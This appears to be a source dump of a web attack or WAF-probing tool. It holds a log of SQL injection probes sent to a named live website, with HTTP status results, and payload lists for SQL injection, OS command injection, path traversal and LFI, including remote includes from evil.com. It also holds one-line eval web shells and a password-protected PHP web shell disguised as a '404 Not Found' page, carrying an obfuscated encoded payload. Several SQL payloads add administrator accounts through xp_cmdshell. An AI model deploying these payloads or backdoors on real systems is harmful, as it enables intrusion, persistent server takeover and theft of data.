 98 | [OK] 32 : 400   usecase:1 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
 99 | -------------
100 | http://www.zoosnet.net/default.aspx
101 | [!!] 33 : 200   usecase:1 exec master..xp_dirtree 'c:\winnt\system32\',1,1
102 | -------------
103 | http://www.zoosnet.net/default.aspx
104 | [OK] 34 : 400   usecase:1 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
105 | -------------
106 | http://www.zoosnet.net/default.aspx
107 | [!!] 35 : 200   usecase:1 exec master.dbo.sp_addsrvrolemember test,sysadmin
108 | -------------
109 | http://www.zoosnet.net/default.aspx
110 | [!!] 36 : 200   usecase:1 GRANT exec On xp_proxiedadata TO public
111 | -------------
112 | http://www.zoosnet.net/default.aspx
113 | [!!] 37 : 200   usecase:1 Create TABLE biao(id int NULL,name nvarchar(256) null);
114 | -------------
115 | http://www.zoosnet.net/default.aspx
116 | [!!] 38 : 200   usecase:1 select name from master.dbo.sysdatabases
117 | -------------
118 | http://www.zoosnet.net/default.aspx
119 | [!!] 39 : 200   usecase:1 SELECT version FROM v$instance;
120 | -------------
121 | http://www.zoosnet.net/default.aspx
122 | [!!] 40 : 200   usecase:1 SELECT @@version
123 | -------------
124 | http://www.zoosnet.net/default.aspx
125 | [!!] 41 : 200   usecase:1 SELECT /*comment*/1
126 | -------------
127 | http://www.zoosnet.net/default.aspx
128 | [!!] 42 : 200   usecase:1 SELECT user_name();
129 | -------------
130 | http://www.zoosnet.net/default.aspx
131 | [!!] 43 : 200   usecase:1 SELECT system_user;
132 | -------------
133 | http://www.zoosnet.net/default.aspx
134 | [!!] 44 : 200   usecase:1 SELECT DB_NAME()
135 | -------------
136 | http://www.zoosnet.net/default.aspx
137 | [!!] 45 : 200   usecase:1 SELECT char(0x41)
138 | -------------
139 | http://www.zoosnet.net/default.aspx
140 | [!!] 46 : 200   usecase:1 IF (1=1) SELECT 1 ELSE SELECT 2
141 | -------------
142 | http://www.zoosnet.net/default.aspx
143 | [!!] 47 : 200   usecase:1 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END
144 | -------------
145 | http://www.zoosnet.net/default.aspx
146 | [OK] 48 : 400   usecase:1 WAITFOR DELAY '0:0:5'
147 | -------------
148 | http://www.zoosnet.net/default.aspx
149 | [OK] 49 : 400   usecase:1 declare @host varchar(800);
150 | -------------
151 | http://www.zoosnet.net/default.aspx
152 | [!!] 50 : 200   usecase:1 SELECT HOST_NAME()
153 | -------------
154 | http://www.zoosnet.net/default.aspx
155 | [OK] 51 : 400   usecase:1  UNION ALL SELECT LOAD_FILE('/etc/passwd')
156 | -------------
157 | http://www.zoosnet.net/default.aspx
158 | [!!] 52 : 200   usecase:1 GRANT ALL PRIVILEGES ON *.* TO test1@'%';
159 | -------------
160 | http://www.zoosnet.net/default.aspx
161 | [!!] 53 : 200   usecase:1 SELECT @@datadir;
162 | -------------
163 | http://www.zoosnet.net/default.aspx
164 | [!!] 54 : 200   usecase:1 SELECT cast('1' AS unsigned integer);
165 | -------------
166 | http://www.zoosnet.net/default.aspx
167 | [!!] 55 : 200   usecase:1 or 2=2%2D%2D
168 | -------------
169 | http://www.zoosnet.net/default.aspx
170 | [!!] 56 : 200   usecase:1 /**/and/**/1=1
171 | -------------
172 | http://www.zoosnet.net/default.aspx
173 | [!!] 57 : 200   usecase:1 %20a%%%nd%201=1
174 | -------------
175 | http://www.zoosnet.net/default.aspx
176 | [!!] 58 : 200   usecase:1 %0aand%0a1=1
177 | -------------
178 | http://www.zoosnet.net/default.aspx
179 | [!!] 59 : 200   usecase:1 a%n%d 1=1
180 | -------------
181 | http://www.zoosnet.net/default.aspx
182 | [!!] 60 : 200   usecase:1 %01and%011=1
183 | -------------
184 | http://www.zoosnet.net/default.aspx
185 | [!!] 61 : 200   usecase:1 and (se%%lect top 1 password from [admin])=0
186 | -------------
187 | http://www.zoosnet.net/default.aspx
188 | [!!] 62 : 200   usecase:1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
189 | -------------
190 | http://www.zoosnet.net/default.aspx
191 | [OK] 63 : 400   usecase:1 /**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/*
192 | -------------
193 | http://www.zoosnet.net/default.aspx
194 | [!!] 64 : 200   usecase:1 ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
195 | -------------
196 | http://www.zoosnet.net/default.aspx
197 | [!!] 65 : 200   usecase:1 %61nd 1=1
198 | -------------
199 | http://www.zoosnet.net/default.aspx
200 | [!!] 66 : 200   usecase:1 &id=union&id=select&id=1,2&id=from%20mysql.user
201 | -------------
202 | http://www.zoosnet.net/default.aspx
203 | [OK] 67 : 400   usecase:1 ?id=1 union select 1&id=pass from admin
204 | 


--------------------------------------------------------------------------------
/usecase/commandi.usecase:
--------------------------------------------------------------------------------
 1 | ifconfig 
 2 | netstat 
 3 | hostname 
 4 | host 
 5 | nslookup 
 6 | nc -l
 7 | ping 192.168.16.16
 8 | groupadd -o
 9 | groupdel 
10 | groupmod -o
11 | useradd -o
12 | userdel 
13 | usermod -o
14 | passwd 
15 | more 
16 | less 
17 | |grep 
18 | sed 
19 | echo "xxx">
20 | shutdown -h now
21 | reboot 
22 | logout 
23 | net user
24 | net localgroup
25 | net start
26 | net stop
27 | copy
28 | move
29 | fgets
30 | file_get_contents
31 | file_put_contents
32 | call_user_func
33 | gzcompress
34 | gzencode
35 | gzread
36 | session_start
37 | scandir
38 | 


--------------------------------------------------------------------------------
/usecase/download.usecase:
--------------------------------------------------------------------------------
 1 | /usr/local/resin/conf/resin.conf
 2 | /etc/my.cnf
 3 | /my.ini/my.cnf
 4 | /etc/vsftpd/vsftpd.conf
 5 | /etc/squid/squid.conf
 6 | /etc/samba/smb.conf
 7 | /etc/httpd/conf/httpd.conf
 8 | /etc/redhat-release
 9 | /etc/passwd
10 | /etc/rc.d
11 | /root/.bash_profile
12 | /root/.bashrc
13 | /etc/xinetd.d/tftp
14 | /etc/ftpusers
15 | /etc/ftpconversions
16 | /etc/ftp-groups
17 | /etc/ftpphosts
18 | /etc/ftpaccess
19 | /etc/exports
20 | /etc/vsftpd/vsftpd.conf 
21 | /etc/crontab
22 | boot.ini
23 | test.mdb
24 | test.myd
25 | test.myi
26 | test.frm
27 | test.sql
28 | test.mdf
29 | test.ndf
30 | test.ldf
31 | test.bak
32 | test.log
33 | Global.asa
34 | test.inc
35 | Web_Data_User.config
36 | web.config
37 | app.config
38 | 
39 | 


--------------------------------------------------------------------------------
/usecase/lfi.usecase:
--------------------------------------------------------------------------------
 1 | ../
 2 | ../../
 3 | %2e%2e%2f%2e%2e%2f
 4 | %2e%2e/%2e%2e/
 5 | ..\..\
 6 | %2e%2e%5c%2e%2e%5c
 7 | %252e%252e%252f%252e%252e%252f
 8 | ..%c0%af..%c0%af
 9 | ..%c1%9c..%c1%9c
10 | c:\windows\
11 | .svn
12 | /etc/passwd
13 | /etc/httpd/conf/httpd.conf
14 | /etc/sysconfig/network-scripts/ifcfg-eth0
15 | /etc/my.cnf
16 | /etc/redhat-release
17 | /etc/shadow
18 | /usr/local/webserver/nginx/conf/nginx.conf
19 | /usr/local/nginx/conf/nginx.conf
20 | /opt/nginx/conf/nginx.conf
21 | /etc/nginx/nginx.conf
22 | /usr/local/nginx/conf/proxy.conf
23 | php://input
24 | php://filter
25 | http://evil.com/evil.js
26 | ftp://evil.com/evil.js
27 | https://evil.com/evil.js
28 | http://220.190.11.16/evil.js


--------------------------------------------------------------------------------
/usecase/spider.usecase:
--------------------------------------------------------------------------------
 1 | Yahoo Slurp
 2 | Yahoo! Slurp China
 3 | YahooSeeker-Testing
 4 | Yahoo-Blogs
 5 | Yahoo-MMCrawler
 6 | Y!J Yahoo Japan
 7 | yahoo contentmatch crawler
 8 | Yahoo Feed Seeker
 9 | Mediapartners-Google
10 | Googlebot
11 | Google AdSense
12 | adsbot-google
13 | Feedfetcher-Google
14 | googlefriendconnect
15 | googlebot-mobile
16 | googlebot-image
17 | Google Desktop Search
18 | BaiDuSpider
19 | baiducustomer
20 | baidu-thumbnail
21 | baiduspider-mobile-gate
22 | Baiduspider-mobile
23 | Baiduspider-video
24 | Baiduspider-news
25 | baidu-transcoder
26 | MSNBot
27 | msnbot-media
28 | msrabot
29 | msnbot-products
30 | msnbot-academic
31 | msnbot-newsblogs
32 | bingbot   
33 | microsoft-atl-native
34 | SandCrawler (Microsoft)
35 | iaskspider
36 | Sina Iask Spider
37 | qihoobot
38 | 360Spider
39 | Sosospider
40 | Sosoimagespider
41 | Sosoblogspider
42 | youdaobot
43 | yodaobot-image
44 | yodaobot-reader
45 | YoudaoFeedFetcher
46 | Outfoxbot
47 | YoudaoFeedFetcher
48 | Sogou Spider
49 | sogou web robot
50 | YisouSpider
51 | EtaoSpider
52 | JikeSpider
53 | EasouSpider
54 | ia_archiver
55 | Scooter
56 | lycos_spider_(t-rex)
57 | fast-webcrawler
58 | slurp
59 | Adminrtspider
60 | lanshanbot
61 | GouGou
62 | ask jeeves/teoma
63 | ask
64 | GigaBot
65 | eApolloBot
66 | P.Arthur
67 | InfoPath
68 | DigExt
69 | SurveyBot
70 | Lilina
71 | Yandex Bot 
72 | TurnitinBot
73 | WebGather
74 | Tagyu Agent
75 | HTTrack off-line browser
76 | Harvest
77 | 50.nu
78 | 
79 | 


--------------------------------------------------------------------------------
/usecase/sqli.usecase:
--------------------------------------------------------------------------------
 1 | 1 and 1=1
 2 | 1 or 'ab'='ab
 3 | 1 and ord(mid(version(),1,1))>51/*
 4 | 1 order by 10--
 5 | 1 ;select BENCHMARK(100000,SHA1('true')), false);--
 6 | 1 having 1=1
 7 | 1 GROUP BY colume_got having 1=1
 8 | 1 ;create table cmd(a text)
 9 | 1 "UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29
10 | 1 =-9%0Aunion%0Aselect 1,2,3,4"
11 | 1 null union all select 1,user(),3,4,5/*
12 | 1 ;insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* ');
13 | 1 
14 | 1 and 1=(Select IS_MEMBER('db_owner'))
15 | 1 And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
16 | 1 and 1= (Select HAS_DBACCESS('master'))
17 | 1 And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
18 | 1 and char(124)%2Buser%2Bchar(124)=0
19 | 1 and user>0
20 | 1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
21 | 1 And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
22 | 1 and exists (select * from sysobjects);--
23 | 1 ;declare @d int;--
24 | 1 ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
25 | 1 select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
26 | 1 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
27 | 1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select  shell 
28 | 1 ("cmd.exe /c net user admin admin1234 /add")')
29 | 1 ";DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:
30 | 1 \WINNT\system32\cmd.exe /c net user paf pafpaf /add';--"
31 | 1 EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
32 | 1 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 
33 | 1 exec master..xp_dirtree 'c:\winnt\system32\',1,1
34 | 1 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
35 | 1 exec master.dbo.sp_addsrvrolemember test,sysadmin
36 | 1 GRANT exec On xp_proxiedadata TO public
37 | 1 Create TABLE biao(id int NULL,name nvarchar(256) null);
38 | 1 select name from master.dbo.sysdatabases
39 | 1 SELECT version FROM v$instance;
40 | 1 SELECT @@version
41 | 1 SELECT /*comment*/1
42 | 1 SELECT user_name();
43 | 1 SELECT system_user;
44 | 1 SELECT DB_NAME() 
45 | 1 SELECT char(0x41)
46 | 1 IF (1=1) SELECT 1 ELSE SELECT 2
47 | 1 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END
48 | 1 WAITFOR DELAY '0:0:5'
49 | 1 declare @host varchar(800); 
50 | 1 SELECT HOST_NAME() 
51 | 1  UNION ALL SELECT LOAD_FILE('/etc/passwd')
52 | 1 GRANT ALL PRIVILEGES ON *.* TO test1@'%';
53 | 1 SELECT @@datadir; 
54 | 1 SELECT cast('1' AS unsigned integer);
55 | 1 or 2=2%2D%2D
56 | 1 /**/and/**/1=1
57 | 1 %20a%%%nd%201=1
58 | 1 %0aand%0a1=1
59 | 1 a%n%d 1=1
60 | 1 %01and%011=1
61 | 1 and (se%%lect top 1 password from [admin])=0
62 | 1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
63 | 1 /**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/*
64 | 1 ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
65 | 1 %61nd 1=1
66 | 1 &id=union&id=select&id=1,2&id=from%20mysql.user
67 | 1 ?id=1 union select 1&id=pass from admin
68 | 


--------------------------------------------------------------------------------
/usecase/upload_content/a.php:
--------------------------------------------------------------------------------
1 | <?php @eval($_POST['1']);?>


--------------------------------------------------------------------------------
/usecase/upload_content/b.asp:
--------------------------------------------------------------------------------
1 | <%eval request("istar")%>


--------------------------------------------------------------------------------
/usecase/upload_content/c.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
2 | 


--------------------------------------------------------------------------------
/usecase/upload_content/webshell/404.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | @session_start();
 3 | @set_time_limit(0); 
 4 | @error_reporting(0);
 5 | $salt = "silic";
 6 | $psw = trim($_POST['pass']);
 7 | $pass = $salt.$psw;
 8 | $pass = md5(md5(md5($pass)));
 9 | $chk_login = 1;
10 | $password = "88f078ec861a3e4baeb858e1b4308ef0";
11 | if($pass == $password)
12 | {
13 | $_SESSION['ses'] = "$pass";
14 | }
15 | if($chk_login)
16 | {
17 | if(!isset($_SESSION['ses']) or $_SESSION['ses'] != $password)
18 | {
19 | die("
20 | <title>404 Not Found</title>
21 | <h1>Not Found</h1>
22 | <p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
23 | <hr>
24 | <address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80 </address>
25 | <style>
26 | input { margin:0;background-color:#fff;border:1px solid #fff; }
27 | </style>
28 | <center>
29 | <form method=post>
30 | <input type=password name=pass>
31 | </form></center>
32 | ");
33 | }
34 | }
35 | $code = "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